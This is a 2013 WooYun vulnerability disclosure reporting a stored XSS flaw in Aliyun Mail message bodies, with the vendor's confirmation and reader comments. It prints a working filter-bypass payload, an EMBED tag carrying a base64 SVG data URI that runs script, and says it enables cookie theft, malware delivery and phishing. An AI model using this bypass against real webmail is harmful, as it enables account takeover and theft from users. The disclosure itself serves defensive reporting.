当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-037870

漏洞标题:阿里云邮箱存储型XSS漏洞

相关厂商:阿里巴巴

漏洞作者: Liuz5O69

提交时间:2013-09-23 15:27

修复时间:2013-11-07 15:28

公开时间:2013-11-07 15:28

漏洞类型:xss跨站脚本攻击

危害等级:中

自评Rank:7

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-09-23: 细节已通知厂商并且等待厂商处理中
2013-09-23: 厂商已经确认,细节仅向厂商公开
2013-10-03: 细节向核心白帽子及相关领域专家公开
2013-10-13: 细节向普通白帽子公开
2013-10-23: 细节向实习白帽子公开
2013-11-07: 细节向公众公开

简要描述:

阿里云邮箱邮件正文存在存储型跨站漏洞,可通过在HTML内嵌data uri scheme标记的方式来绕过执行恶意脚本。成功窃取信息可以登陆受攻击者邮箱,甚至阿里云用户中心(从雅虎邮箱迁移申请的aliyun邮箱登陆密码可同时登陆用户中心)。

详细说明:

该漏洞能够在除IE以外的FireFox,Opera,webkit内核浏览器,Safari下执行成功,通过发送邮件

<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoJ2dvb2Qgam9iJyk7PC9zY3JpcHQ+PC9zdmc+" AllowScriptAccess="always"></EMBED>

,base64部分解密为

<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"><script type="text/ecmascript">alert('good job');</script></svg>

,可以触发漏洞,如图:

main.jpg


漏洞证明:

通过更换base64部分编码的脚本可实施一些常规攻击(以下在Firefox下测试通过):
1 邮件挂马

mal.JPG


2 cookie及访问者信息窃取

cookie.JPG


cookie2.JPG


3 XSS phishing,URL保持不变刷伪造页面:

phishing.JPG


刷写脚本:

phish2.JPG


修复方案:

过滤

版权声明:转载请注明来源 Liuz5O69@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2013-09-23 16:31

厂商回复:

感谢你对我们的支持与关注,该问题我们正在修复~~

最新状态:

暂无


漏洞评价:

评论

  1. 2013-09-23 17:05 | Mas ( 实习白帽子 | Rank:42 漏洞数:15 )

    厂商回复:感谢你对我们的支持与关注,该问题我们正在修复~~

  2. 2013-09-23 17:47 | Leon ( 路人 | Rank:25 漏洞数:6 | 永无宁日啊)

    my god 我是受害者。。。

  3. 2013-09-23 18:08 | Liuz5O69 ( 实习白帽子 | Rank:54 漏洞数:8 | 一个默默的学习者。)

    @Leon ????你是正准备提交的吗

  4. 2013-09-24 09:35 | Leon ( 路人 | Rank:25 漏洞数:6 | 永无宁日啊)

    @Liuz5O69 不是,,我用的他们邮箱。。。